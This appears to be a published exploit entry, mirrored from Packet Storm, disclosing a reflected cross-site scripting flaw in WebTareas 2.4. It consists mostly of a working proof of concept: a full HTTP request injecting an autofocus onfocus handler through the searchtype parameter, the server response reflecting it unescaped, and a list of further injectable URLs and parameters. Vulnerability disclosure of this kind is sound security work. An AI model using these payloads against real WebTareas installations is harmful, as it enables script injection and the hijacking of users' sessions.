Exploit for WebTareas 2.4 Cross Site Scripting

Name: Exploit for WebTareas 2.4 Cross Site Scripting
Rating: 5 (103 reviews)
2023-03-27 | CVSS 6.8
## https://sploitus.com/exploit?id=PACKETSTORM:171520
# Exploit Title: WebTareas 2.4 - Reflected XSS (Unauthorised)  
# Date: 15/10/2022  
# Exploit Author: Hubert Wojciechowski  
# Contact Author: hub.woj12345@gmail.com  
# Vendor Homepage: https://sourceforge.net/projects/webtareas/  
# Software Link: https://sourceforge.net/projects/webtareas/  
# Version: 2.4  
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23  
  
## Proof Of Concept   
-----------------------------------------------------------------------------------------------------------------------  
Param: searchtype  
-----------------------------------------------------------------------------------------------------------------------  
Req  
-----------------------------------------------------------------------------------------------------------------------  
GET /webtareas/general/search.php?searchtype=r4e3a%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dalert(1)%2f%2fvv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=&csrfToken=aa05732647773f33e57175a417789d26e8176474dfc87f4694c62af12c24799461b7c0&searchfor=zxcv&Save=Szukaj HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Origin: http://127.0.0.1  
Connection: close  
Referer: http://127.0.0.1/webtareas/general/search.php?searchtype=simple  
Cookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
  
  
-----------------------------------------------------------------------------------------------------------------------  
Res:  
-----------------------------------------------------------------------------------------------------------------------  
HTTP/1.1 200 OK  
Date: Sat, 15 Oct 2022 07:46:31 GMT  
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30  
X-Powered-By: PHP/7.4.30  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Options: nosniff  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 11147  
[...]  
<form accept-charset="UNKNOWN" method="POST" action="../general/search.php?searchtype=r4e3a\"><input type=text autofocus onfocus=alert(1)//vv7vqt317x0&searchfor=zxcv&nosearch=&searchonly=" name="searchForm" enctype="multipart/form-data" onsubmit="tinyMCE.triggerSave();return __default_checkformdata(this)">  
[...]  
  
-----------------------------------------------------------------------------------------------------------------------  
Other vulnerable url and params:  
-----------------------------------------------------------------------------------------------------------------------  
/webtareas/administration/print_layout.php [doc_type]  
/webtareas/general/login.php [logout]  
/webtareas/general/login.php [session]  
/webtareas/general/newnotifications.php [msg]  
/webtareas/general/search.php [searchtype]  
/webtareas/administration/print_layout.php [doc_type]